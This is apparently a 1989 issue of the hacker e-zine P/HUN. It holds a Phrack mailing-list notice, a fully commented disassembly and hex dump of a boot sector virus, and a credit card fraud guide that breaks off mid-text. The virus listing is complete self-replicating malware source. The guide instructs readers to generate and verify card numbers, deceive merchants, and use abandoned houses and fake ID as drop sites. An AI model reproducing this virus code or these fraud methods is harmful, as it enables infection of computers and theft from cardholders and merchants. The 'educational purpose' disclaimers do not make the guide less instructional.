()=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=() P/HUN Issue #4 , Volume 2 Articles [11] Released: June 27th of 1989. Comments: SummerCon 89' =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = The Toll Center Bulletin Board System = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ( 2600 Magazine BBS # 5 & P/HUN Magazine Inc. Headquarters) (718)358/9209 Presents...... -== P/HUN ISSUE IV ==- -------------- P/HUN Issue #4, Volume 2: Phile 1 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Introduction: ------------- Welcome once again to another exiciting issue of P/HUN Magazine. We are little behind schedule. The delay was caused by a severe disk crash which wiped out most of the files. The whole issue had to be put back together again. This time we have a special segment called P/HUN Telecom News/Advancements, which contains the latest news in the telecommunications industry as we know today. This segment will be released on a regular basis. I would like to thank DareDevil for taking the first shot it. We would appreciate some feedback on this new concept. If you have any articles to contribute please get in touch with us at our BBS or at our Usenet address. Red Knight Usenet Address: pdave@dasys1.UUCP SysOp of The Toll Center Phortune 500/Board of Directors ------------------------------------------------------------------------------- =:Table of Contents:= ------------------ # Phile Description Author Size -- ------------------------------------------- ------ ------ 1) Introduction & Table of Contents Red Knight 2K 2) The Banishment of Phrack Inc. Knight Lightning 5K 3) A Boot Sector Virus Southern Cross 21K 4) Vital Credit Card Information & Usage The Sparrow 31K 5) An Introduction to House Explosives Franz Liszt 19K 6) TSPS No. 1B - Call Processing & Explanation Phelix the Hack 34K 7) Free Computer Magazines Southern Cross 6K 8) A Guide to Hacking AMOS NightCrawler 21K 9) USDN versus ISDN Lord Micro 22K 10) P/HUN Telecom News/Advancements DareDevil 30K 11) P/HUN Telecom News/Advamcements DareDevil 24K ------------------------------------------------------------------------------- P/HUN Issue #4, Volume 2: Phile 2 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD The Banishment Of Phrack Inc. ----------------------------- by Knight Lightning June 27, 1989 - August 28, 1989 Hello. This message is being sent to all members of the Phrack Inc. Mailing List to forewarn you of things to come. Due to certain policies at the University Of Missouri - Columbia (UMCVMB), Taran King and I will lose our Bitnet/Internet accounts on June 27, 1989. I would advise not sending files or mail to either of our address after June 26, 1989 just to be safe. Our "exile" from UMCVMB will last until August 28, 1989 when fall classes begin. However, this does not mean we are putting Phrack Inc. on hold by any means. Solution: Anyone who has files to be placed in Phrack Inc. after June 26, 1989 should contact HATCHET MOLLY. He can be reached at "TK0GRM2@NIU.BITNET" or "TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU". He will be handling the gathering of files from you... our network friends. Phrack Inc. Newsletter Issue 27 will be released within the next TWO WEEKS. If you would like to receive this issue, please let me know as soon as possible. The reason I make mention of this is because many people on the mailing list are not currently accessing their work station for a variety of reasons (school's out, on vacation, etc). So let us know and we will send it to you when we release it. The situation with our Bitnet/Internet addresses will not affect SummerCon '89 in any way. However, any issues of Phrack Inc. that we do release between June 27, 1989 and August 28, 1989 will *NOT* be sent over the networks to you until September 1989. Taran King and I will not have access to the network and will have no way to send these files until then. So it looks like bulletin boards and software pirates will get first look during this time period. So if you have any further questions about this situation, mail us right away. Remember, any comments or information for Phrack Inc. after June 26, 1989 should be directed to Hatchet Molly. Knight Lightning Taran King C483307@UMCVMB.BITNET C488869@UMCVMB.BITNET C483307@UMCVMB.MISSOURI.EDU C488869@UMCVMB.MISSOURI.EDU Hatchet Molly TK0GRM2@NIU.BITNET TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU "The Real Future Is Behind You!" =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 3 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD A BOOT SECTOR VIRUS 5/15/89 The following is a disassembled and commented version of the Alemeda College Boot infector virus. Courtesy of Southern Cross. ;-----------------------------------------------------------------------; ; This virus is of the "FLOPPY ONLY" variety. ; ; It replicates to the boot sector of a floppy disk and when it gains control ; it will move itself to upper memory. It redirects the keyboard ; ; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; ; it will attempt to infect any floppy it finds in drive A:. ; ; It keeps the real boot sector at track 39, sector 8, head 0 ; ; It does not map this sector bad in the fat (unlike the Pakistani Brain) ; and should that area be used by a file, the virus ; ; will die. It also contains no anti detection mechanisms as does the ; ; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; ; sector 9 because this is common to all floppy formats both single ; ; sided and double sided. It does not contain any malevolent TROJAN ; ; HORSE code. It does appear to contain a count of how many times it ; ; has infected other diskettes although this is harmless and the count ; ; is never accessed. ; ; ; ; Things to note about this virus: ; ; It can not only live through an ALT-CTRL-DEL reboot command, but this ; ; is its primary (only for that matter) means of reproduction to other ; ; floppy diskettes. The only way to remove it from an infected system ; ; is to turn the machine off and reboot an uninfected copy of DOS. ; ; It is even resident when no floppy is booted but BASIC is loaded ; ; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; ; it activates and infectes the floppy from which the user is ; ; attempting to boot. ; ; ; ; Also note that because of the POP CS command to pass control to ; ; its self in upper memory, this virus does not to work on 80286 ; ; machines (because this is not a valid 80286 instruction). ; ; ; ; The Norton Utilities can be used to identify infected diskettes by ; ; looking at the boot sector and the DOS SYS utility can be used to ; ; remove it (unlike the Pakistani Brain). ; ;-----------------------------------------------------------------------; ; ORG 7C00H ; ; TOS LABEL WORD ;TOP OF STACK ;-----------------------------------------------------------------------; ; 1. Find top of memory and copy ourself up there. (keeping same offset); ; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; ; 3. Redirect int 9 (keyboard) to ourself in top of memory ; ; 4. Jump to ourself at top of memory ; ; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; ;-----------------------------------------------------------------------; BEGIN: CLI ;INITIALIZE STACK XOR AX,AX ; MOV SS,AX ; MOV SP,offset TOS ; STI ; ; MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) MOV DS,BX ; MOV AX,[0013H] ; MUL BX ; SUB AX,07E0H ; (7C00H+512)/16 MOV ES,AX ; ; PUSH CS ;DS = CS POP DS ; ; CMP DI,3456H ;IF THE VIRUS IS REBOOTING... JNE B_10 ; DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- ; B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY MOV DI,SI ; MOV CX,512 ; CLD ; REP MOVSB ; ; MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE MOV CX,128 ; REP MOVSB ; ; CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) ; PUSH ES ;ES=HI ;JUMP TO OUR HI CODE WITH POP CS ; CS = ES ; PUSH DS ;DS=0 ;ES = DS POP ES ; ; MOV BX,SP ;SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 MOV DX,CX ;CX=0 ; DRIVE A: HEAD 0 MOV CX,2708H ; TRACK 40, SECTOR 8 MOV AX,0201H ; READ SECTOR INT 13H ; (common to 8/9 sect. 1/2 sided!) JB $ ; HANG IF ERROR ; JMP JMP_BOOT ;JMP 0000:7C00 ; ;-----------------------------------------------------------------------; ; SAVE THEN REDIRECT INT 9 VECTOR ; ; ; ; ON ENTRY: DS = 0 ; ; ES = WHERE TO SAVE OLD_09 & (HI) ; ; WHERE NEW_09 IS (HI) ; ;-----------------------------------------------------------------------; PUT_NEW_09: ; DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 ; MOV SI,9*4 ;COPY INT 9 VECTOR TO MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) MOV CX,0004 ; ; CLI ; REP MOVSB ; MOV Word Ptr [9*4],offset NEW_09 MOV [(9*4)+2],ES ; STI ; ; RET ; ; ;-----------------------------------------------------------------------; ; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; ;-----------------------------------------------------------------------; ACK_KEYBD: ; IN AL,61H ;RESET KEYBOARD THEN CONTINUE MOV AH,AL ; OR AL,80H ; OUT 61H,AL ; XCHG AL,AH ; OUT 61H,AL ; JMP RBOOT ; ; ;-----------------------------------------------------------------------; ; DATA AREA WHICH IS NOT USED IN THIS VERSION ; ; REASON UNKNOWN ; ;-----------------------------------------------------------------------; TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 DB 27H,0,2,2 ; (CURRENTLY NOT USED) DB 27H,0,3,2 ; DB 27H,0,4,2 ; DB 27H,0,5,2 ; DB 27H,0,6,2 ; DB 27H,0,7,2 ; DB 27H,0,8,2 ; ; ;A7C9A LABEL BYTE ; DW 00024H ;NOT USED DB 0ADH ; DB 07CH ; DB 0A3H ; DW 00026H ; ; ;L7CA1: ; POP CX ;NOT USED POP DI ; POP SI ; POP ES ; POP DS ; POP AX ; POPF ; JMP 1111:1111 ; ; ;-----------------------------------------------------------------------; ; IF ALT & CTRL & DEL THEN ... ; ; IF ALT & CTRL & ? THEN ... ; ;-----------------------------------------------------------------------; NEW_09: PUSHF ; STI ; ; PUSH AX ; PUSH BX ; PUSH DS ; ; PUSH CS ;DS=CS POP DS ; ; MOV BX,[ALT_CTRL] ;BX=SCAN CODE LAST TIME IN AL,60H ;GET SCAN CODE MOV AH,AL ;SAVE IN AH AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH ; CMP AL,1DH ;IS IT A [CTRL]... JNE N09_10 ;...JUMP IF NO MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) JMP N09_30 ; ; N09_10: CMP AL,38H ;IS IT AN [ALT]... JNE N09_20 ;...JUMP IF NO MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) JMP N09_30 ; ; N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... JNE N09_30 ;...JUMP IF NO ; CMP AL,17H ;IF [I]... JE N09_X0 ;...JUMP IF YES CMP AL,53H ;IF [DEL]... JE ACK_KEYBD ;...JUMP IF YES ; N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME ; N09_90: POP DS ; POP BX ; POP AX ; POPF ; ; DB 0EAH ;JMP F000:E987 OLD_09 DW ? ; DW 0F000H ; ; N09_X0: JMP N09_X1 ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? MOV AX,0800H ;AL=0, AH=DELAY ARG OUT DX,AL ; CALL DELAY ; MOV [ALT_CTRL],AX ;AX=0 ; ; MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR INT 10H ; MOV AH,2 ;SET CURSOR POS 0,0 XOR DX,DX ; MOV BH,DH ; PAGE 0 INT 10H ; ; MOV AH,1 ;SET CURSOR TYPE MOV CX,0607H ; INT 10H ; ; MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) CALL DELAY ; ; CLI ; OUT 20H,AL ;SEND EOI TO INT CONTROLLER ; MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) MOV SI,offset BEGIN - 128 ; MOV CX,128 ; CLD ; REP MOVSB ; ; MOV DS,CX ;CX=0 ;DS=0 ; MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR MOV [(19H*4)+2],CS ; ; MOV AX,0040H ;DS = ROM DATA AREA MOV DS,AX ; ; MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) ; PUSH DS ;IF BIOS F000:E502 == 21E4... MOV AX,0F000H ; MOV DS,AX ; CMP Word Ptr [0E502H],21E4H ; POP DS ; JE R_90 ; INT 19H ; IF NOT...REBOOT ; R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! ; ;-----------------------------------------------------------------------; ; REBOOT INT VECTOR ; ;-----------------------------------------------------------------------; NEW_19: XOR AX,AX ; ; MOV DS,AX ;DS=0 MOV AX,[0410] ;AX=EQUIP FLAG TEST AL,1 ;IF FLOPPY DRIVES ... JNZ N19_20 ;...JUMP N19_10: PUSH CS ;ELSE ES=CS POP ES ; CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) INT 18H ;LOAD BASIC ; N19_20: MOV CX,0004 ;RETRY COUNT = 4 ; N19_22: PUSH CX ; MOV AH,00 ;RESET DISK INT 13 ; JB N19_81 ; MOV AX,0201 ;READ BOOT SECTOR PUSH DS ; POP ES ; MOV BX,offset BEGIN ; MOV CX,1 ;TRACK 0, SECTOR 1 INT 13H ; N19_81: POP CX ; JNB N19_90 ; LOOP N19_22 ; JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC ; ;-----------------------------------------------------------------------; ; Reinfection segment. ; ;-----------------------------------------------------------------------; N19_90: CMP DI,3456 ;IF NOT FLAG SET... JNZ RE_INFECT ;...RE INFECT ; JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR JMP 0000:7C00H ; ; ;-----------------------------------------------------------------------; ; Reinfection Segment. ; ;-----------------------------------------------------------------------; RE_INFECT: ; MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH MOV CX,00E6H ; OURSELF MOV DI,SI ; PUSH CS ; POP ES ; CLD ; REPE CMPSB ; JE RI_12 ;IF NOT EQUAL... ; INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) ; ;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; MOV BX,offset TABLE ;FORMAT INFO MOV DX,0000 ;DRIVE A: HEAD 0 MOV CH,40-1 ;TRACK 39 MOV AH,5 ;FORMAT JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! ; ; <<< NO EXECUTION PATH TO HERE >>> ; JB RI_80 ; ; ;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 MOV BX,offset BEGIN ;TRACK 40H MOV CL,8 ;SECTOR 8 MOV AX,0301H ;WRITE 1 SECTOR INT 13H ; ; PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) POP ES ; JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE ; MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! MOV AX,0301 ; INT 13H ; JB RI_80 ; IF ERROR...JUMP TO BOOT CODE ; RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... INT 19H ;...FLAG AND REBOOT ; RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) JMP JMP_BOOT ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS ; MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG MOV BX,0040H ; MOV DS,BX ; MOV [0072H],AX ; 0040:0072 = RESET FLAG JMP N09_90 ; ; ;-----------------------------------------------------------------------; ; DELAY ; ; ; ; ON ENTRY AH:CX = LOOP COUNT ; ;-----------------------------------------------------------------------; DELAY: SUB CX,CX ; D_01: LOOP $ ; SUB AH,1 ; JNZ D_01 ; RET ; ; ;-----------------------------------------------------------------------; ; ; ;-----------------------------------------------------------------------; A7DF4 DB 27H,00H,8,2 COUNTER_1 DW 001CH ALT_CTRL DW 0 A7DFC DB 27H,0,8,2 END ;-----------------------------------------------------------------------; ; Hexadecimal representation. ; ;-----------------------------------------------------------------------; ;7C00 FA 31 C0 8E D0 BC 00 7C-FB BB 40 00 8E DB A1 13 z1@.P<.|$;@..[!. ;7C10 00 F7 E3 2D E0 07 8E C0-0E 1F 81 FF 56 34 75 04 .wc-..@....V4u. ;7C20 FF 0E F8 7D 89 E6 89 F7-B9 00 02 FC F3 A4 89 CE ..x.f.w9..|s$.N ;7C30 BF 80 7B B9 80 00 F3 A4-E8 15 00 06 0F 1E 07 89 ?.$9..s$h....... ;7C40 E3 89 CA B9 08 27 B8 01-02 CD 13 72 FE E9 38 01 c.J9.'8..M.rDi8. ;7C50 FF 0E 13 04 BE 24 00 BF-E6 7C B9 04 00 FA F3 A4 ....>$.?f|9..zs$ ;7C60 C7 06 24 00 AD 7C 8C 06-26 00 FB C3 E4 61 88 C4 G.$.-|..&.$Cda.D ;7C70 0C 80 E6 61 86 C4 E6 61-EB 73 27 00 01 02 27 00 ..fa.Dfaks'...'. ;7C80 02 02 27 00 03 02 27 00-04 02 27 00 05 02 27 00 ..'...'...'...'. ;7C90 06 02 27 00 07 02 27 00-08 02 24 00 AD 7C A3 26 ..'...'.$.-|#& ;7CA0 09 5F 5E 07 1F 58 9D-EA 11 11 1 FB .Y_^..X.j.....$P ;7CB0 53 1E 0E 1F 8B 1E FA 7D-E4 60 88 C4 25 7F 88 S.....zd.D%..< ;7CC0 1D 75 04 88 E3 EB 16 3C-38 75 04 88 E7 EB 0E .u..ck.<8u..gk.. ;7CD0 FB 08 08 75 08 3C 17 74-11 3C 53 74 8F 89 1E $..u.<.t..$9.. ;7D20 FC F3 A4 8E D9 C7 06 64-00 52 7D 8C 0E 66 00 B8 |s$.YG.R..f.8 ;7D30 40 00 8E D8 88 26 17 00-FF 06 13 00 1E B8 00 F0 @..X.&.....8.p ;7D4 8E D8 81 3E 02 E5 E4 21-1F 74 02 CD 19 EA 02 E5 .X.>.ed!.t.M.e ;7D50 00 F0 31 C0 8E D8 A1 10-04 A8 01 75 07 0E 07 E8 .p1@.X!..(.u.. ;7D60 EE FE CD 18 B9 04 00 51-B4 00 CD 13 72 0D B8 01 nDM.9..Q4.M.r.8 ;7D70 02 1E 07 BB 00 7C B9 01-00 C3 59 73 04 E2 E7 ...;.|9..M.Ys.bg ;780 EB DB 81 FF 56 34 75 05-EA 00 7C 00 00 BE 00 7C k[..V4u|..>.| ;7D90 B9 E6 00 89 F7 0E 07 FC-F3 A6 74 2D 26 FF 06 F8 9f..w..|t-&..x ;7DA0 7D BB 7A 7C BA 00 00 B5-27 B4 05 EB 02 72 1F 8E ;z|:..5.k.r.. ;7DB0 C2 BB 00 7C B1 08 B8 01-03 CD 13 0E 07 72 0F B9 B;.|1.8....r.9 ;7DC0 01 00 B8 01 03 CD 13 72-05 BF 56 34 CD 19 E8 7F ..8..M.rV4M.h. ;7DD0 FE 26 FF 0E F8 7D EB B0-89 1E FA 7D A1 F8 7D BB D&..xk0!x; ;7DE0 40 00 8E DB A3 72 0E9-F7 FE 29 C9 E2 FE 80 EC @..[#r.iwIbD.l ;7DF0 01 75 F9 C3 27 00 08 02-1C 00 00 00 27 00 08 02 .uyC'.....'... ;---------------------------------------------------------------------; End of commented code for the Alameda College Boot Infector Virus. All viruses are dangerous.I take no responsibility for damages, outbreaks, or other ramifications caused by misuse. This phile is for educational purpose only! I expect everyone to use caution and common sense when dealing with viruses. Enjoy! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 4 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Vital Credit Card Information and Usage or Fun with Numbers revision A Compiled, and made intelligible by The Sparrow ** MANY Thanks to Codebreaker; for without him I would be lost. (in JFK?) A big thankyou to The White Rider for proof-reading this. ( If you find any mistakes, BLAME HIM!!! HAHAHA) Hello to: Fry Guy ("You've got to hear about this new scam. . .") Video Vindicator ("Fly down and let's go casing!") _____________________________________________________________________________ Completion Date: Tuesday, November Twenty-second, in the year of our Lord, one thousand, nine hundred, eighty eight, 3:39 am. Last Updated On: Tuesday, March Twenty-second, in the year of our Lord, one thousand, nine hundred, eighty nine, 5:01 am. ______________________________________________________________________________ The following is list of ideas and facts that have been brought together for the sole purpose of educating those who lack this knowledge. In writing this, I do not intend for the reader to use any information contained herein, but rather to further his/her own education and provoke thought to perhaps better the society we live in. ______________________________________________________________________________ I. Card Types The first digit of the credit card number (henceforth referred to as CCN) determines the credit card type. A simple list might be: First Digit of Credit Card Card Type -------------------------- --------- 3 American Express 4 Visa 5 Mastercard 6 Discover II. Bank and Branch Numbers Sample Credit Card: 1234 567 890 123 ^ | Within the first group of numbers from the left [called Group 4] the Bank name and branch are contained. We have already discovered that the first digit of Group 4 reveals the card type. We will now look at how to decipher which bank issued the card, and which branch of the bank the actual card holder banks at. Look at the Second, Third, and Fourth digits of Group 4. These three numbers tell which bank issued the card. A small list follows this paragraph, although you can compile a list by yourself. Just glance at cards you get your hands on which the bank name is printed, and record the information. [ Editor's Note: This is a hard concept to explain, so let me give you an example. Lets say Bank of Hicksville's group 4 Visa Credit Card reads 4560. (560 = Bank of Hicksville). BUT, 4561 is NOT necessarily Bank of Hicksville, too. 4561 could be Bank of Booniesville. So what I am trying to get across is that the next bank in line doesn't HAVE to be 4570 -- it could be earlier in numbers. ] ----------VISA ---- Group 4 Bank Name -------- --------- 4019 Bank of America 4024 Bank of America 4052 First Cincinatti 4060 Navy Federal Credit Union 4128 Citibank 4131 State Street Bank 4215 Marine Midland 4225 Chase Manhattan 4231 Chase Lincoln First Classic 4232 Chase Lincoln First Classic 4241 Nat. Westminester Bank 4250 First Chicago Bank 4271 Citibank Preferred 4302 H.H.B.C. 4310 Imperial Savings 4317 Gold Dome 4387 Bank One 4428 Bank of Hoven 4811 Bank of Hawaii 4897 Village bank of Cincinatti ----------Mastercards ----------- Group 4 Bank Name --------- --------- 5215 Marine Midland 5217 Manufacturers Hanover Trust 5233 Huntington Bank 5242 Chevy Chase Federal Savings 5254 Bank of America 5263 Chemical Bank 5273 Bank of America 5286 Chase Lincoln First 5317 Norwest 5323 Bank of New York 5329 Maryland Bank NA (MBNA) 5410 Citibank Preferred 5411 1st Fin. bank of Omaha 5414 Nat. Westminester Bank 5415 Colonial National Bank 5424 Citibank 5465 Chase Manhattan 5678 Marine Midland III. Bank Codes [ International Bank or Interlink Numbers] These are used in checking credit. Later on, you will learn that while checking the credit cards for the amount of credit, you will be prompted to enter the Bank ID along with the Merchant ID. The bank IDs are, I believe, from the following list. One note-- you cannot just choose any Bank ID and use it with any merchant ID. They must correspond in some way. How, I don't know. I THINK that a bank issues a merchant number to each of their customers. If you try to use a merchant number with a bank number, and the merchant doesn't actually use the bank that is specified by the bank number, you are going to get some problems. (ie, the verification won't go through.) Again, I will state that this is only a theory. The reason that I post this theory is to get minds working. So far, no one has mentioned their ideas on the function of Bank Codes. If you do happen to find out the true meaning of these numbers, please get in touch with me so I can update this list. Thanks. One word- on VISA credit cards, the bank IDs are the first 4 digits of the Card. For Mastercards, however, they vary. A list follows: Bank Bank Code ---- --------- Chemical Bank 1263 Marine Midland 6207 [1207?] Manufacturers Hanover Trust 1033 Citibank 1035 Huntington 1226 First Card Gold 1286 MBNA 6017 Chase Manhatten 1665 [ Bank from 5127 ] 1015 IV. "Group 3" Sample Credit Card: 1234 5678 9012 3456 ^ | | Group 3, or the second group on a credit card in from the left, contains some VERY useful information about the card. This group holds the information on the Maximum Expiration Date and the Maximum Credit Limit. (I believe that you can all see the benefits of this.) This does not mean, however, that the ACTUAL expiration date and ACTUAL credit limit are in this group. What it means is this: When the different Credit Card Companies issue Credit Cards to the consumer, he of course has a credit limit. And when the Companies formulate credit cards, they create certain groups for certain customers. That is, certain "groups" contain all the credit cards for people with a credit limit between $x and $y. The same thing goes with the expiration dates. Everyone whose card expires after m1/y1 and before m2/y2 has their credit card in a certain group formulated by the company. For example: My name is Joe Schmoe. My Visa credit card expires in January of the year 1999. My credit limit on this card is $7,000. My credit card number (CCN) will probably be in the same group as my brother-in-law Jack Koff whose card expires in December of 1998 and whose credit limit is $6,000. BUT, our cards will be in different groups entirely than my boss' whose card expires in June of 1995 and whose credit limit is $40,000. Back to the point of section IV: Lets say you have a credit card with a known expiration date and known credit limit. Lets also say that you happen upon ANOTHER credit card whose numbers are the same up until the last 2 groups. (You and I see that these two cards were issued by the same bank and PROBABLY have a credit limit in the same ball park and an expiration date not far from each other. ) BUT, even though you have this new credit card, you lost the expiration date and credit limit. GOSH! How are you going to use this card when you don't know this information?? APROXIMATE! You have a general idea now, and you can go from there. One warning here: I have found that small groups of cards with high credit limits are often hidden in between large groups of cards with very low credit limits. For instance, lets look at this card: 4123 4567 8901 2345. From -4567 until 4600 in group 3 (from the right) gold cards may exist. But after 4600 and before 4567, cards with credit limits of $500 exist. Kind of sucks, huh?? Just wanted to make you aware of this. Now, once you learn how to modify these without hurting the card, you have increased your value as a carder by 100x. But be careful. Often when you modify a card's group 3 to get a higher credit limit line of cards, you will find the entire line is dead. Or, in other cases, just the original card you find is dead, and all surrounding cards are valid with the new credit limits. V. "Group 2" & "Group 1" These two groups, or the last two groups on the credit card, are the easiest to modify. By changing these in such a way, you can formulate new credit cards simply by doing a little math in your head. These two groups contain the IDentification codes. Later on in your carding careers, you might find out how to change these, and thus, you have found the secret to a vault of new and awaiting credit cards. I stress here that the only purpose that these two groups serve is to differentiate between customers. If the first two groups of two cards are the same and the last two groups of two cards are different, the two cards were issued by the same bank and probably have similar credit limits, but are of course issued to different people. VI. Credit Card Verification Once you have a newly formulated or newly found Credit Card, you must first check to see if it is valid before you distribute or use it. The reason for this is this: Although you may not have faltered in your calculations, and you created a credit card following the correct formula, the card may turn up as invalid. This is because it has not been issued yet. Visa or Mastercard has not issued that card to a customer yet. You are ahead of the credit card company. (Don't you feel important??!) If this case arises, simply formulate a new credit card from the original valid credit card, and check it once again. There is no known way around this except to wait. OKAY- you want to check your credit card and see how much money this person has. There are many, many credit verifiers around. The easiest way to get ahold of one is to go into any store which accepts credit cards and look on the side of the machine that imprints the carbons with the credit card number, etc. Or, look right on the wall next to the register. There should be a number to call, a merchant number, and perhaps a bank number. Jot these down and head on home. The format for these is usually different, but all have the basic idea in mind. Call an operator of some sort, tell her the authorization information that she asks for (bank number,merchant number, etc) and give her the card and the amount for which to verify the card. She will check and let you know if it has enough credit left. Simple. BUT*** ******************* ONE NOTE ********************** When you check a card for a certain amount of money, that amount of money is subtracted from the amount available on the card. For example, if a card has $5,000 left on it, and you get ahold of it and check it for $2,000, you can only spend $3,000 before it tells you that you don't have the necessary credit to go through with a transaction. VII. Purchasing Merchandise: The Real Story OKAY, now that you have a VALID credit card, you will most likely want to get some newly acquired merchandise. This is all fine and dandy, but if you don't know what you are doing, you can get yourself and most likely your friends in a LOT of trouble. --------------------------------------------------------------------------- *** WARNING : NEVER ORDER SOMETHING FROM YOUR HOUSE. ALWAYS GO OUT TO A *** *** PAY PHONE. ALSO, ALWAYS HAVE A STORY WORKED OUT BEFORE YOU CALL. *** *** THAT IS, YOUR NAME, ADDRESS, JOB, PHONE NUMBER, EXCUSE FOR NOT BEING*** *** HOME, MOTHER'S MAIDEN NAME, ETC. ANY STUTTERING OR HESITATION COULD *** *** BLOW THE WHOLE SHOW !!! !!! !!! !!! !!! !!! !!! !!! !!! !!!*** --------------------------------------------------------------------------- FIRST- Let me clarify something. When you order something over the phone, and the person selling you the items wants to know the actual Cardholder's name, address, phone number, etc, you DO NOT have to give him/her the correct information. [UNLESS: You do have to give the person correct information if they have an online connection to a credit record bureau such as CBI or TRW. In this case, as they can verify everything that you say in a matter of moments, just do your best, get a new card, and never order from this company again. I will not lie to you: some companies do have this capability. But if you stick with little bussinesses who need your money, you'll do fine. ] Bullshit your way through. Or hire a social engineer to do it for you. You do not even have to give the correct expiration date! Almost Any expiration date will work as long as it is at least one month ahead of the current month and it is not TOO far ahead in time so that it jumped over the actual expiration date. (ie, if the current date is 10/89, give the expiration date 11/89 -- simple) The company from which you are buying things can not verify the extra information YOU give them until after the order has been processed and the package shipped. They have to get in touch with a Credit Union, which will be discussed later on in this summary, to verify it all. * ALL THAT THEY CAN VERIFY PRONTO IS THAT THE CREDIT CARD IS VALID, AND THAT IT HAS ENOUGH CREDIT TO PAY FOR THE MERCHANDISE YOU ARE PURCHASING. * My suggestion, however, is that you give them the phone number of a pay phone near your house. [ Or, if you want to REALLY make sure things go smoothly, give them the number of a direct dial VMB local to the shipping address. ] If they want to call you back, FINE. Ask them to do so between the hours of X pm and Y pm. And, just pitch tent at the phone for a few hours a night. No problem. They will almost always call right back, since they don't want to inconvenience their customer who happens to be buying $6,000 worth of computers at the time. Understand? SECOND- Where should I ask have them ship it to, you ask? Fret not, my little friend in carding. Before you call and order your things, first go out and find an abandoned house. These still work best. Either one that has been moved out of, and no one has moved into yet. Or, if you can, find one that is REALLY abandoned. (BUT MAKE SURE IT HAS A STREET ADDRESS THAT THE POSTMAN OR UPS MAN CAN FIND!) Jot down this address. This is referred to as a drop site. [ Ed. Note: if, and I say IF you can rent a mailbox, do so. Make sure they sign for everything (UPS, etc) and bring some FAKE ID with you to open it up. Most of the time, they will give you hastle, and verify EVERYTHING you give them. So it is really not that easy to get one of these. At least try, though. ] OKAY, give this address to the man or lady who is taking your order. Tell them this is where you live. REMEMBER, they can not verify that you don't live there for quite a while. They will send everything there. When the shipment comes (either Overnight, Second Day, or whenever), pick it up (CASUALLY) and stroll home to open your package. If it does not come, or if the salesperson gives you trouble, don't worry. If it didn't come, it is because 1) It got intercepted by the feds or 2) The company didn't process it because they did actually try to verify your address, name, and phone number, thus delaying your shipment, but saving themselves a lot of money. Just try another store until you find some 